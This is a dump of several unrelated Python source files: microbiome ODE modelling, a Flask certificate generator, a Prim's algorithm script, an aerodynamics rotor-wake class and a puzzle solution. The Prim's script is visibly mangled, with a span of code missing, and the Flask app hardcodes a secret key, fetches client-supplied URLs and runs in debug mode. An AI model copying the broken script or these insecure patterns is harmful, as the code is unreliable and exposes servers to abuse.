{"seq_id":"72707290433","text":"# -*- coding: utf-8 -*-\n# Extension for handling time series data\n\nimport torch\nfrom torch import nn\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom mbpert.odesolver import RK45\n\n\n# End point of integration, assume integration starts at t = 0. Used to rescale\n# the actual observation time point in days. A larger value should be used if\n# the observed time series are steady state abundances\n# INTEGRATE_END = 30\nINTEGRATE_END = 10 # for MTIST\n\ndef glvp2(t, x, r, A, eps, P, T):\n    \"\"\"Define generalized Lotka-Volterra dynamic system with time-dependent\n    perturbations\n\n    x --- (n_species,) Species (dimensionless) absolute abundances\n    r --- (n_species,) Growth rate\n    A --- (n_species, n_species) Species interaction matrix\n    eps --- (n_species, perts) eps_{ij}: Species i's susceptibility to perturbation j\n    P --- (T+1, perts) Time-dependent perturbation matrix: P_{dp} = 1 if pert p is applied at day d\n    T --- duration of the observation in days, used to scale t\n    \"\"\"\n    assert t <= INTEGRATE_END\n\n    out = x * (r + A @ x + eps @ P[int(T * t / INTEGRATE_END)])\n    return out\n\n\n# Custom PyTorch module\n\nclass MBPertTS(nn.Module):\n    def __init__(self, n_species, P):\n        super().__init__()\n        self.r = nn.Parameter(torch.rand((n_species, )))\n\n        if torch.any(P):\n            self.eps = nn.Parameter(torch.randn(n_species, P.shape[1]))\n        else: # no perturbations, so eps not a Parameter any more\n            self.eps = torch.zeros(n_species, P.shape[1])\n\n        # Proper initialization of interaction matrix for stability\n        self.A = 1 / (2 * n_species**(0.5)) * torch.randn(n_species, n_species)\n        self.A = nn.Parameter(self.A.fill_diagonal_(-1))\n        # mask = ~torch.eye(n_species, dtype=torch.bool)\n        # self.A = -torch.eye(n_species) # making diag elements -1\n        # self.A[mask] = 1 / (2 * n_species**(0.5)) * torch.randn(n_species**2 - n_species, requires_grad=True)\n        # self.A = nn.Parameter(self.A)\n\n        self.P = P.to('cuda') if torch.cuda.is_available() else P # time-dependent perturbation matrix\n        self.T = P.shape[0] - 1 # max days of the experiment\n\n    def forward(self, x, t):\n        self.solver = RK45(glvp2, [0,t], args=(self.r, self.A, self.eps, self.P, self.T))\n        return self.solver.solve(x)\n\n# Custom Dataset\n\n# Custom Dataset to handle each data unit. Here each data unit corresponds to\n# one time slice: initial state at t = 0 and output state at t = t\nclass MBPertTSDataset(Dataset):\n    def __init__(self, X, P, meta, transform=None, target_transform=None):\n        \"\"\"X --- (n_species, n_t) Microbiome time series data X_{i} giving species i's abundance trajectory.\n               The first column is the initial state. For multiple groups, X is a columnwise\n               concatenation of species trajectories of all groups.\n           P --- (T+1, perts) Time-dependent perturbation matrix: P_{dp} = 1 if pert p is applied at day d\n               where d = 0, 1, ..., T\n           meta --- (n_t, 2) Metadata with two columns, group id and measurement time.\n               The first column is group id in natural order (if all data are from one individual \n               then this will be a column of 1s), the second column contains actual time units (days)\n               at which the data was observed, corresponding to columns of X. 
Typically,\n but not always, the initial observation is at day 0.\n \"\"\"\n self.X = np.loadtxt(X, dtype=np.float32) if isinstance(X, str) else X.astype(np.float32)\n self.P = np.loadtxt(P, dtype=bool) if isinstance(P, str) else P.astype(bool)\n\n # If there is only one column/perturbation, np.loadtxt ignores the column dimension,\n # so here make P a column vector\n if self.P.ndim == 1:\n self.P = self.P.reshape(-1, 1)\n self.P = torch.from_numpy(self.P).float()\n\n self.meta = np.loadtxt(meta, dtype=np.float32) if isinstance(meta, str) else meta.astype(np.float32)\n self.tobs = self.meta[:, 1]\n self.n_species = self.X.shape[0]\n self.T = self.P.shape[0] - 1\n self.gids = self.meta[:, 0]\n self.n_groups = int(max(self.gids))\n\n self.transform = transform\n self.target_transform = target_transform\n\n if len(self.tobs) != self.X.shape[1] or len(self.tobs) < 2:\n raise ValueError(\"Incorrect input data size.\")\n\n def __len__(self):\n return len(self.tobs) - 1\n\n def __getitem__(self, idx):\n gid = self.gids[idx] # which group does 'idx' correspond to\n\n # If next idx corresponds to a different group, then we are at the end time point, \n # no data is available for the current group, return the first data unit of next group.\n # Note that this will produce a duplicate data unit for the first data unit of each group\n # from the second to the last group. But this allows us to continue using len(self.tobs) - 1\n # instead of len(self.tobs) - self.n_groups in defining the number of instances in the Dataset, \n # which works for single group case. \n if self.gids[idx + 1] != gid: \n start = idx + 1\n x0 = torch.from_numpy(self.X[:, start])\n t = self.tobs[start + 1] * INTEGRATE_END / self.T\n xt = torch.from_numpy(self.X[:, start + 1])\n else:\n start = np.argmax(self.gids == gid)\n x0 = torch.from_numpy(self.X[:, start])\n t = self.tobs[idx + 1] * INTEGRATE_END / self.T\n xt = torch.from_numpy(self.X[:, idx + 1])\n\n if self.transform:\n x0 = self.transform(x0)\n if self.target_transform:\n xt = self.target_transform(xt)\n\n return (x0, t), xt\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yuanwxu/mbpert","sub_path":"mbpert/mbpertTS.py","file_name":"mbpertTS.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25219488589","text":"from flask import Flask, render_template, redirect, request, flash, url_for, jsonify, abort, send_from_directory, make_response, send_file\nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime, os\nimport json\nimport csv\nimport io\nfrom google.cloud import storage\nfrom zipfile import ZipFile\nimport requests\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\nAPP_URL = os.environ.get(\"APP_URL\", \"test\")\nBULK_CERTIFY_URL = os.environ.get(\"BULK_CERTIFY_URL\", \"test\")\nCLOUD_STORAGE_BUCKET=os.environ.get(\"CLOUD_STORAGE_BUCKET\", \"test\")\n\napp = Flask(__name__)\n\napp.secret_key = \"GDSCSJEC\"\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///certs.db\"\n\ndb = SQLAlchemy(app)\n\n\nclass Fonts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=False)\n font_cdn = db.Column(db.String(500), nullable=True)\n\nclass Certificate(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n number = db.Column(db.String(50), nullable=False)\n name = db.Column(db.String(50), nullable=False)\n email = db.Column(db.String(50), nullable=False)\n # 
is_email_sent = db.Column(db.Boolean, default=False)\n    coursename = db.Column(db.String(500), nullable=False)\n    # last_update = db.Column(db.String(50), nullable=False, default=x)\n    group_id = db.Column(db.Integer, db.ForeignKey('group.id'))\n    # user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n    qrcode = db.relationship('QRCode', cascade=\"all,delete\", backref='qrcode')\n\nclass Group(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(50), nullable=False)\n    date = db.Column(db.String(50), nullable=False)\n    textColor = db.Column(db.String(50), nullable=True)\n    bg_image = db.Column(db.String(500), nullable=True)\n    font_size = db.Column(db.Integer, nullable=False)\n    font_name = db.Column(db.String(250), nullable=False)\n    certx = db.Column(db.Integer, nullable=False)\n    certy = db.Column(db.Integer, nullable=False)\n    qrx = db.Column(db.Integer, nullable=False)\n    qry = db.Column(db.Integer, nullable=False)\n    certnox = db.Column(db.Integer, nullable=False)\n    certnoy = db.Column(db.Integer, nullable=False)\n    prefix = db.Column(db.String(20), default='CGV')\n    zip_url = db.Column(db.String(500), default=None)\n    # user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n    certificates = db.relationship(\n        'Certificate', cascade=\"all,delete\", backref='certificates')\n\n\n\nclass QRCode(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    certificate_num = db.Column(db.String(50), nullable=False)\n    link = db.Column(db.String(200), nullable=False)\n    qr_code = db.Column(db.String(100), nullable=True)\n    certificate_id = db.Column(db.Integer, db.ForeignKey('certificate.id'))\n\n\n@app.route(\"/\")\ndef dashboard_page():\n    postc = len(Certificate.query.order_by(Certificate.id).all())\n    return render_template('dashboard.html', favTitle=\"Hello world\", postc=postc)\n\n@app.route('/get-all-fonts', methods=['GET'])\ndef get_all_fonts():\n    fonts = Fonts.query.order_by(Fonts.id).all()\n    data = {'font': [fonts.name for fonts in fonts]}\n    return jsonify(data)\n\n@app.route(\"/edit/group/<id>\", methods=['GET', 'POST'])\ndef edit_org_page(id):\n    if request.method == 'POST':\n        name = request.form.get(\"name\")\n        certx = request.form.get(\"certx\")\n        certy = request.form.get(\"certy\")\n        qrx = request.form.get(\"qrx\")\n        qry = request.form.get(\"qry\")\n        certnox = request.form.get(\"certnox\")\n        certnoy = request.form.get(\"certnoy\")\n        font_size = request.form.get(\"font_size\")\n        font_name = request.form.get(\"font_name\")\n        textColor = request.form.get(\"textColor\")\n        bg_image = request.files.get(\"bg_image\")\n        prefix = request.form.get(\"prefix\")\n        date = datetime.datetime.now()\n        if id == '0':\n            try:\n                post = Group(name=name, textColor=textColor, font_size=font_size, font_name=font_name, certx=certx, certy=certy, qrx=qrx, qry=qry,\n                             certnox=certnox, certnoy=certnoy, prefix=prefix, date=date)\n                img_name = name.replace(\" \", \"+\")\n                if not app.debug:\n                    # upload_image(bg_image, folder=\"backgrounds\", name=name)\n                    # bg_url = f\"https://cgv.s3.us-east-2.amazonaws.com/backgrounds/{img_name}.png\"\n                    # bg_url = upload(bg_image)\n                    pass\n                else:\n                    try:\n                        os.mkdir(\"static/backgrounds\")\n                    except Exception:\n                        pass\n                    bg_image.save(f\"static/backgrounds/{img_name}.png\")\n                    bg_url = f\"{APP_URL}/static/backgrounds/{img_name}.png\"\n                post.bg_image = bg_url\n                db.session.add(post)\n                db.session.commit()\n                return jsonify(result=True, status=200)\n            except Exception:\n                return jsonify(group_error=True)\n        else:\n            try:\n                post = Group.query.filter_by(id=id).first()\n                post.name = name\n                img_name = name.replace(\" \", \"+\")\n                if bg_image:\n                    if not app.debug:\n                        # upload_image(bg_image, folder=\"backgrounds\", name=name)\n                        # bg_url = f\"https://cgv.s3.us-east-2.amazonaws.com/backgrounds/{img_name}.png\"\n                        # bg_url = upload(bg_image)\n                        pass\n                    else:\n                        bg_image.save(f\"static/backgrounds/{img_name}.png\")\n                        bg_url = f\"{APP_URL}/static/backgrounds/{img_name}.png\"\n                    post.bg_image = bg_url\n                post.date = date\n                post.certx = certx\n                post.certy = certy\n                post.qrx = qrx\n                post.qry = qry\n                post.font_name = font_name\n                post.font_size = font_size\n                post.certnox = certnox\n                post.certnoy = certnoy\n                post.textColor = textColor\n                # post.user_id = current_user.id\n                db.session.commit()\n                return jsonify(result=True, status=200)\n            except Exception:\n                return jsonify(result=False, status=500)\n    grp = Group.query.filter_by(id=id).first()\n    post = {\n        \"id\": grp.id,\n        \"name\": grp.name,\n        \"certx\": grp.certx,\n        \"certy\": grp.certy,\n        \"qrx\": grp.qrx,\n        \"qry\": grp.qry,\n        \"certnox\": grp.certnox,\n        \"certnoy\": grp.certnoy,\n        \"font_size\": grp.font_size,\n        \"font_name\": grp.font_name,\n        \"textColor\": grp.textColor,\n    }\n    return jsonify(favTitle='Certify', id=id, post=post)\n\n@app.route(\"/view/groups\", methods=['GET', 'POST'])\ndef view_org_page():\n    post = Group.query.order_by(Group.id).all()\n    return render_template('org_table.html', post=post)\n\n\n@app.route(\"/view/<grp_id>/certificates\", methods=['GET', 'POST'])\ndef view_certificate_page(grp_id):\n    post = Certificate.query.filter_by(group_id=grp_id).order_by(Certificate.id)\n    group = Group.query.filter_by(id=grp_id).first()\n    return render_template('certificate_table.html', post=post, grp_id=grp_id, BULK_CERTIFY_URL=BULK_CERTIFY_URL, zip_url=group.zip_url)\n\n\n@app.route(\"/edit/<grp_id>/certificates/<id>\", methods=['GET', 'POST'])\ndef edit_certificates_page(grp_id, id):\n    if request.method == 'POST':\n        data = json.loads(request.data)\n        name = data[\"name\"]\n        coursename = data[\"course\"]\n        email = data[\"email\"]\n        group = Group.query.filter_by(id=grp_id).first()\n        try:\n            last_certificate = Certificate.query.filter_by(\n                group_id=grp_id).order_by(-Certificate.id).first()\n            last_certificate_num = int(\n                last_certificate.number[len(last_certificate.number)-4:])\n            cert_number = str(last_certificate_num + 1).zfill(4)\n        except Exception as e:\n            cert_number = '1'.zfill(4)\n        number = group.prefix + cert_number\n        # userid = current_user.id\n        # last_update = x\n        if id == '0':\n            postcheck = Certificate.query.filter_by(\n                email=email, group_id=grp_id).first()\n            if (postcheck == None):\n                try:\n                    post = Certificate(name=name, number=number, email=email, coursename=coursename, group_id=grp_id)\n                    db.session.add(post)\n                    db.session.commit()\n                    return jsonify(certificate_success=True)\n                except Exception as e:\n                    print(e)\n                    return jsonify(certificate_error=True)\n            else:\n                return jsonify(certificate_duplicate=True)\n        else:\n            try:\n                post = Certificate.query.filter_by(id=id).first()\n                post.name = name\n                post.coursename = coursename\n                post.email = email\n                # post.user_id = current_user.id\n                post.group_id = grp_id\n                # post.last_update = time\n                db.session.commit()\n                return jsonify(certificate_success=True)\n            except Exception as e:\n                print(e)\n                return jsonify(certificate_error=True)\n    cert = Certificate.query.filter_by(id=id).first()\n    post = {\n        \"id\": cert.id,\n        \"name\": cert.name,\n        \"coursename\": cert.coursename,\n        \"email\": cert.email,\n        \"number\": cert.number\n    }\n    return jsonify(id=id, post=post)\n\n@app.route(\"/delete/<grp_id>/certificates/<id>\", methods=['GET', 'POST'])\ndef delete_certificates_page(grp_id, id):\n    delete_certificates_page = Certificate.query.filter_by(id=id).first()\n    db.session.delete(delete_certificates_page)\n    db.session.commit()\n    flash(\"Certificate deleted successfully!\", \"success\")\n    return redirect(f'/view/{grp_id}/certificates')\n\n@app.route(\"/certificate/generate/<certificateno>\", methods=['GET', 'POST'])\ndef certificate_generate(certificateno, bulkDownload = 0):\n    if (request.method == 'GET'):\n        bulkDownload = request.values.get('bulk', 0)\n    postc = Certificate.query.filter_by(number=certificateno).first()\n    if (postc != None):\n        posto = Group.query.filter_by(id=postc.group_id).first()\n        postf = Fonts.query.filter_by(name=posto.font_name).first()\n        return render_template('certificate.html', postf=postf, postc=postc, posto=posto, number=certificateno, bulk = bulkDownload)\n    elif (postc == None):\n        flash(\"No details found. Contact your organization!\", \"danger\")\n    return render_template('Redesign-generate.html')\n\n@app.route('/upload/<grp_id>/certificate', methods=['POST', 'GET'])\ndef upload_csv(grp_id):\n    group = Group.query.filter_by(id=grp_id).first()\n    csv_file = request.files['fileToUpload']\n    csv_file = io.TextIOWrapper(csv_file, encoding='utf-8')\n    csv_reader = csv.reader(csv_file, delimiter=',')\n    # This skips the first row of the CSV file.\n    next(csv_reader)\n    for row in csv_reader:\n        try:\n            last_certificate = Certificate.query.filter_by(\n                group_id=grp_id).order_by(-Certificate.id).first()\n            last_certificate_num = int(\n                last_certificate.number[len(last_certificate.number)-4:])\n            cert_number = str(last_certificate_num + 1).zfill(4)\n        except Exception as e:\n            cert_number = '1'.zfill(4)\n        number = group.prefix + cert_number\n        certificate = Certificate(\n            number=number, name=row[0], email=row[1], coursename=row[2], group_id=grp_id)\n        db.session.add(certificate)\n        db.session.commit()\n    return jsonify(result=True, status=200)\n\n@app.route(\"/certificate/mass-generate/<groupno>\")\ndef massGenerate(groupno):\n    certificate_list = Certificate.query.filter_by(group_id = groupno).limit(3).all()\n    response = {}\n\n    response[\"group_no\"] = groupno\n    response[\"certificates\"] = []\n\n    for certificate in certificate_list:\n        response[\"certificates\"].append({\n            \"certificate_no\": certificate.number,\n            \"certficate_link\": APP_URL + \"/certificate/generate/\" + certificate.number\n        })\n\n    return jsonify(response)\n\n@app.route(\"/download-zip/<groupno>\", methods=['POST'])\ndef downloadzip(groupno):\n    request_data = request.get_json()\n    certificate_public_urls = request_data[\"certificate_public_urls\"]\n\n    print(certificate_public_urls)\n\n    zipper = ZipFile(f\"certificates_{groupno}.zip\", 'w')\n\n    for certificate in certificate_public_urls:\n        r = requests.get(certificate, allow_redirects=True)\n        filename = certificate.split(\"%2F\")[-1]\n        with open(filename, 'wb') as f:\n            f.write(r.content)\n        zipper.write(filename)\n\n    zipper.close()\n\n    return send_file(f\"certificates_{groupno}.zip\", mimetype=\"application/zip\", as_attachment=True, attachment_filename=f\"certificates_{groupno}.zip\")\n\n@app.route(\"/update-zip-url/<group_no>\", methods=[\"PUT\"])\ndef update_zip_url(group_no):\n    group = Group.query.filter_by(id=group_no).first()\n    zip_url = request.args.get(\"zip_url\")\n    group.zip_url = zip_url\n    db.session.commit()\n    return \"\", 201\n\ndef add_default_fonts():\n    total = len(Fonts.query.all())\n    if total == 0:\n        TimesNewRoman = Fonts(name=\"Times New Roman\", 
font_cdn=\"https://fonts.cdnfonts.com/css/times-new-roman\")\n OpenSans = Fonts(name=\"Open Sans\", font_cdn=\"https://fonts.cdnfonts.com/css/open-sans\")\n db.session.add(TimesNewRoman)\n db.session.add(OpenSans)\n db.session.commit()\n\nif __name__ == '__main__':\n db.create_all()\n add_default_fonts()\n app.run(debug=True, host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))","repo_name":"GDSC-SJEC/gccp-gdscsjec-certifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"489210305","text":"inf=10**9\nfrom collections import defaultdict\ndef findMin(value,setMST):\n min=inf\n vertex=0\n for i in range(len(value)):\n if setMST[i]==False and value[i]adjMatrix[u][j] and setMST[j]==False:\n value[j]=adjMatrix[u][j]\n parent[j]=u\n path=defaultdict(list)\n for i in range(v):\n for j in range(v):\n if parent[j]==i:\n path[i].append(j)\n for source in path:\n dest=path[source]\n for x in dest:\n print(source,\"-->\",x,value[x])\n\nadjMatrix=[ [0, 2, 0, 6, 0],\n [2, 0, 3, 8, 5],\n [0, 3, 0, 0, 7],\n [6, 8, 0, 0, 9],\n [0, 5, 7, 9, 0]]\nPrismAlgorithm(adjMatrix,len(adjMatrix))\n#TC (V^2)\n","repo_name":"RohanKumarRoy/Algorithm","sub_path":"prism_algorithm.py","file_name":"prism_algorithm.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38836179813","text":"## @ingroup Analyses-Propulsion\n# Rotor_Wake_Fidelity_One.py\n#\n# Created: Jan 2022, R. Erhard\n# Modified: \n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\nfrom SUAVE.Core import Data\nfrom SUAVE.Components import Wings\nfrom SUAVE.Components.Energy.Energy_Component import Energy_Component\nfrom SUAVE.Analyses.Propulsion.Rotor_Wake_Fidelity_Zero import Rotor_Wake_Fidelity_Zero\nfrom SUAVE.Methods.Propulsion.Rotor_Wake.Fidelity_One.fidelity_one_wake_convergence import fidelity_one_wake_convergence\nfrom SUAVE.Methods.Propulsion.Rotor_Wake.Fidelity_One.compute_wake_induced_velocity import compute_wake_induced_velocity \nfrom SUAVE.Methods.Aerodynamics.Common.Fidelity_Zero.Lift.extract_wing_VD import extract_wing_collocation_points\n\n# package imports\nimport copy\nimport numpy as np\n# ----------------------------------------------------------------------\n# Generalized Rotor Class\n# ----------------------------------------------------------------------\n## @ingroup Analyses-Propulsion\nclass Rotor_Wake_Fidelity_One(Energy_Component):\n \"\"\" SUAVE.Analyses.Propulsion.Rotor_Wake_Fidelity_One()\n \n The Fidelity One Rotor Wake Class\n Uses a semi-prescribed vortex wake (PVW) model of the rotor wake\n\n Assumptions:\n None\n\n Source:\n None\n \"\"\"\n def __defaults__(self):\n \"\"\"This sets the default values for the component to function.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n None\n \"\"\"\n\n self.tag = 'rotor_wake'\n self.wake_method = 'Fidelity_One'\n self.vortex_distribution = Data()\n self.wake_method_fidelity = 0\n self.semi_prescribed_converge = False # flag for convergence on semi-prescribed wake shape\n self.vtk_save_flag = False # flag for saving vtk outputs of wake\n self.vtk_save_loc = None # location to save vtk outputs of wake\n \n self.wake_settings = Data()\n 
self.wake_settings.number_rotor_rotations = 5\n        self.wake_settings.number_steps_per_rotation = 72\n        self.wake_settings.initial_timestep_offset = 0 # initial timestep\n        \n        # wake convergence criteria\n        self.maximum_convergence_iteration = 10\n        self.axial_velocity_convergence_tolerance = 1e-2\n        \n        # flags for slipstream interaction\n        self.slipstream = False\n        self.verbose = False\n        \n    def initialize(self,rotor,conditions):\n        \"\"\"\n        Initializes the rotor by evaluating the BET once. This is required for generating the \n        circulation strengths for the vortex distribution in the prescribed vortex wake, and the \n        initial wake shape, which relies on the axial inflow induced by the wake at the rotor disc.\n        \n        Assumptions:\n        None\n\n        Source:\n        N/A\n\n        Inputs:\n        self - rotor wake\n        rotor - SUAVE rotor\n        conditions - conditions\n        \n        \n        Outputs:\n        None\n        \n        Properties Used:\n        None\n        \n        \"\"\"\n        # run the BET once using fidelity zero inflow\n        rotor_temp = copy.deepcopy(rotor)\n        rotor_temp.Wake = Rotor_Wake_Fidelity_Zero()\n        _,_,_,_,outputs,_ = rotor_temp.spin(conditions)\n        \n        rotor.outputs = outputs\n        \n        # match the azimuthal discretization between rotor and wake\n        if self.wake_settings.number_steps_per_rotation != rotor.number_azimuthal_stations:\n            self.wake_settings.number_steps_per_rotation = rotor.number_azimuthal_stations\n            \n            if self.verbose:\n                print(\"Wake azimuthal discretization does not match rotor discretization. \\\n                Resetting wake to match rotor of Na=\"+str(rotor.number_azimuthal_stations))\n        \n        return\n    \n    def evaluate(self,rotor,wake_inputs,conditions):\n        \"\"\"\n        Wake evaluation is performed using a semi-prescribed vortex wake (PVW) method for Fidelity One.\n        \n        Assumptions:\n        None\n\n        Source:\n        N/A\n\n        Inputs:\n        self - rotor wake\n        rotor - SUAVE rotor\n        wake_inputs.\n           Ua - Axial velocity\n           Ut - Tangential velocity\n           r - radius distribution\n        conditions - conditions\n        \n        \n        Outputs:\n        va - axially-induced velocity from rotor wake\n        vt - tangentially-induced velocity from rotor wake\n        \n        Properties Used:\n        None\n        \"\"\" \n        \n        # Initialize rotor with single pass of VW \n        self.initialize(rotor,conditions)\n        \n        # Converge on the Fidelity-One rotor wake shape\n        WD, va, vt = fidelity_one_wake_convergence(self,rotor,wake_inputs)\n        \n        # Store wake shape\n        self.vortex_distribution = WD\n        \n        return va, vt\n    \n    def evaluate_slipstream(self,rotor,geometry,ctrl_pts,wing_instance=None):\n        \"\"\"\n        Evaluates the velocities induced by the rotor on a specified wing of the vehicle.\n        If no wing instance is specified, uses main wing or last available wing in geometry.\n        \n        Assumptions:\n        None\n\n        Source:\n        N/A\n\n        Inputs:\n        self - rotor wake\n        rotor - rotor\n        geometry - vehicle geometry\n        \n        Outputs:\n        wake_V_ind - induced velocity from rotor wake at (VD.XC, VD.YC, VD.ZC)\n        \n        Properties Used:\n        None\n        \"\"\"\n        # Check for wing if wing instance is unspecified\n        if wing_instance == None:\n            nmw = 0\n            # check for main wing\n            for i,wing in enumerate(geometry.wings):\n                if not isinstance(wing,Wings.Main_Wing): continue\n                nmw +=1 \n                wing_instance = wing\n                wing_instance_idx = i\n            if nmw == 1:\n                pass\n            elif nmw>1:\n                print(\"No wing specified for slipstream analysis. Multiple main wings in vehicle, using the last one.\")\n            else:\n                print(\"No wing specified for slipstream analysis. 
No main wing defined, using the last wing in vehicle.\")\n wing_instance = wing \n wing_instance_idx = i\n \n # Isolate the VD components corresponding to this wing instance\n wing_CPs, slipstream_vd_ids = extract_wing_collocation_points(geometry, wing_instance_idx)\n \n # Evaluate rotor slipstream effect on specified wing instance\n rot_V_wake_ind = self.evaluate_wake_velocities(rotor, wing_CPs, ctrl_pts)\n \n # Expand\n wake_V_ind = np.zeros((ctrl_pts,geometry.vortex_distribution.n_cp,3))\n wake_V_ind[:,slipstream_vd_ids,:] = rot_V_wake_ind\n \n \n return wake_V_ind \n \n def evaluate_wake_velocities(self,rotor,VD,num_ctrl_pts):\n \"\"\"\n Links the rotor wake to compute the wake-induced velocities at the vortex distribution\n control points.\n \n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n self - rotor wake\n rotor - rotor\n VD - vortex distribution\n num_ctrl_pts - number of analysis control points\n \n Outputs:\n prop_V_wake_ind - induced velocity from rotor wake at (VD.XC, VD.YC, VD.ZC)\n \n Properties Used:\n None\n \"\"\" \n #extract wake shape previously generated\n wake_vortex_distribution = rotor.Wake.vortex_distribution\n \n # compute the induced velocity from the rotor wake on the lifting surfaces\n VD.Wake = wake_vortex_distribution\n rot_V_wake_ind = compute_wake_induced_velocity(wake_vortex_distribution,VD,num_ctrl_pts) \n \n return rot_V_wake_ind\n \n def shift_wake_VD(self,wVD, offset):\n \"\"\"\n This shifts the wake by the (x,y,z) coordinates of the offset. \n This is useful for rotors with identical wakes that can be reused and shifted without regeneration.\n \n Assumptions\n None\n \n Source:\n N/A\n \n Inputs:\n wVD - wake vortex distribution\n offset - (x,y,z) offset distances\n \n Outputs\n None\n \n Properties Used\n None\n \n \"\"\"\n for mat in wVD.keys():\n if 'X' in mat:\n wVD[mat] += offset[0]\n elif 'Y' in mat:\n wVD[mat] += offset[1]\n elif 'Z' in mat:\n wVD[mat] += offset[2]\n for mat in wVD.reshaped_wake.keys():\n if 'X' in mat:\n wVD.reshaped_wake[mat] += offset[0]\n elif 'Y' in mat:\n wVD.reshaped_wake[mat] += offset[1]\n elif 'Z' in mat:\n wVD.reshaped_wake[mat] += offset[2] \n \n # update wake distribution\n self.vortex_distribution = wVD\n return\n \n \n\n\n\n\n\n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Analyses/Propulsion/Rotor_Wake_Fidelity_One.py","file_name":"Rotor_Wake_Fidelity_One.py","file_ext":"py","file_size_in_byte":9470,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"74769973633","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\n# real setup\nn_grid = 300\nserial_number = 1955\n\nfuel_grid = np.zeros(n_grid*n_grid).reshape(n_grid, n_grid)\n\n\ndef calc(x, y, serial_number):\n rack_id = x+10\n power = rack_id*y+serial_number\n return int(str(power*rack_id)[-3])-5\n\n# tests\n# print(calc(122, 79, 57)) # -5\n# print(calc(217, 196, 39)) # 0\n# print(calc(101, 153, 71)) # 4\n\n\n# populate\nfor i in range(n_grid):\n for j in range(n_grid):\n fuel_grid[i][j] = calc(i+1, j+1, serial_number)\ni = 0\nj = 0\nprint(fuel_grid[i:i+3, j:j+3].sum())\n\nstamp_max = 0\nbest_vals = [0, 0, 0]\n# sum sub windows\nfor k in range(1, n_grid):\n grid_window_sum = np.zeros(n_grid*n_grid).reshape(n_grid, n_grid)\n for i in range(n_grid-k+1):\n for j in range(n_grid-k+1):\n grid_window_sum[i][j] = fuel_grid[i:i+k, j:j+k].sum()\n y = np.argmax(grid_window_sum) % n_grid\n x = int((np.argmax(grid_window_sum)-y)/n_grid)\n\n # correcting for indexing from zero\n x 
+= 1\n    y += 1\n\n    if np.max(grid_window_sum) > stamp_max:\n        stamp_max = np.max(grid_window_sum)\n        best_vals = [x, y, k]\n\nprint(best_vals)\n","repo_name":"biernackip/advent_of_code","sub_path":"2018/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"15048816478","text":"from ClaseCalefactorElectrico import Electrico\nfrom ClaseCalefactorGas import Gas\nimport numpy as np\nimport csv\n\nclass Coleccion:\n    __calefactores = np.empty(0, dtype=object)\n\n    def __init__(self):\n        self.__calefactores = np.empty(0, dtype=object)\n    \n    def agregacalefactores(self):\n        arre = int(input('Ingrese cantidad de calefactores a cargar: '))\n        self.__calefactores = np.empty(0, dtype=object)\n\n        band = True\n        arElectrico = open('calefactor-electrico.csv')\n        reader = csv.reader(arElectrico,delimiter=';')\n        fila = next(reader)\n        while band:\n            cal = Electrico(fila[0], fila[1], fila[2])\n            self.__calefactores = np.append(self.__calefactores, cal)\n            try:\n                fila = next(reader)\n            except StopIteration:\n                band = False\n        arElectrico.close()\n        \n        band = True\n        arGas = open('calefactor-a-gas.csv')\n        reader = csv.reader(arGas,delimiter=';')\n        fila1 = next(reader)\n        while band:\n            ga = Gas(fila1[0], fila1[1], fila1[2], fila1[3])\n            self.__calefactores = np.append(self.__calefactores, ga)\n            try:\n                fila1 = next(reader)\n            except StopIteration:\n                band = False\n        arGas.close()\n    \n    def consultarconsumogas(self):\n        min = 999999\n        costo = int(input('Ingrese costo por m3: '))\n        cant = int(input('Ingrese cantidad estimada a consumir por m3: '))\n        print('Calefactores a gas con menor costo de consumo')\n        for i in range(len(self.__calefactores)):\n            if type(self.__calefactores[i]) == Gas:\n                tot = (self.__calefactores[i].getcalorias() / 10000) * (cant * costo)\n                if tot < min:\n                    min = tot\n                    print(self.__calefactores[i])\n    \n    def consultarconsumoelectrico(self):\n        min = 999999\n        costo = int(input('Ingrese costo por KWs: '))\n        cant = int(input('Ingrese cantidad estimada a consumir por KWs: '))\n        print('Calefactores electricos con menor costo de consumo')\n        for i in range(len(self.__calefactores)):\n            if type(self.__calefactores[i]) == Electrico:\n                tot = (self.__calefactores[i].getportencia() / 10000) * (cant * costo)\n                if tot < min:\n                    min = tot\n                    print(self.__calefactores[i])\n    \n    def listarminimos(self):\n        minGas = 999999\n        minElectrico = 999999\n        print('Calefactores de menor consumo')\n        for i in range(len(self.__calefactores)):\n            if type(self.__calefactores[i]) == Gas:\n                totG = (self.__calefactores[i].getcalorias() / 10000)\n                if totG < minGas:\n                    minGas = totG\n                    print(self.__calefactores[i])\n            elif type(self.__calefactores[i]) == Electrico:\n                totE = (self.__calefactores[i].getportencia() / 10000)\n                if totE < minElectrico:\n                    minElectrico = totE\n                    